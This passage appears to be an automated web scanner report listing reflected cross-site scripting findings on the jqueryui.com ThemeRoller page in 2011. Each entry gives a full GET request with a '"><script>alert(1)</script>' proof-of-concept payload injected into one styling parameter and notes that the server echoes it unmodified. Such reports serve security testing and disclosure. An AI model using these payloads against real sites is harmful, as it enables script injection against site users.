GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa91800"><script>alert(1)</script>56b1ce80b05&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ab3"><script>alert(1)</script>a1bd18e5f3c was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa86ab3"><script>alert(1)</script>a1bd18e5f3c&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8ff"><script>alert(1)</script>4dac13d937a was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=1005c8ff"><script>alert(1)</script>4dac13d937a&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:48 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48783"><script>alert(1)</script>fd12b7de828 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=10048783"><script>alert(1)</script>fd12b7de828&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:27 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c8d3"><script>alert(1)</script>73a17b4b229 was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=857c8d3"><script>alert(1)</script>73a17b4b229&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab58a"><script>alert(1)</script>669106d826b was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95ab58a"><script>alert(1)</script>669106d826b&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:54 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca687"><script>alert(1)</script>6a780e1b0e0 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55ca687"><script>alert(1)</script>6a780e1b0e0&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:19 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ba09"><script>alert(1)</script>1615e2d69db was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=559ba09"><script>alert(1)</script>1615e2d69db&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:51 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c945"><script>alert(1)</script>d5c19407d7 was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=751c945"><script>alert(1)</script>d5c19407d7&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:41 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120173
The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c64ac"><script>alert(1)</script>9179f8285de was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0c64ac"><script>alert(1)</script>9179f8285de&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:00 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120176
The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d0d"><script>alert(1)</script>32e75550ce7 was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0c9d0d"><script>alert(1)</script>32e75550ce7&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:26:02 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120176
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e7a"><script>alert(1)</script>363200d54d4 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png43e7a"><script>alert(1)</script>363200d54d4&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 15:25:47 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120110
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75604"><script>alert(1)</script>ba263e0ed7c was submitted in the bgTextureContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=5px&bgColorHeader=5c9ccc&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=55&borderColorHeader=4297d7&fcHeader=ffffff&iconColorHeader=d8e7f3&bgColorContent=fcfdfd&bgTextureContent=06_inset_hard.png75604"><script>alert(1)</script>ba263e0ed7c&bgImgOpacityContent=100&borderColorContent=a6c9e2&fcContent=222222&iconColorContent=469bdd&bgColorDefault=dfeffc&bgTextureDefault=02_glass.png&bgImgOpacityDefault=85&borderColorDefault=c5dbec&fcDefault=2e6e9e&iconColorDefault=6da8d5&bgColorHover=d0e5f5&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=79b7e7&fcHover=1d5987&iconColorHover=217bc0&bgColorActive=f5f8f9&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=79b7e7&fcActive=e17009&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacit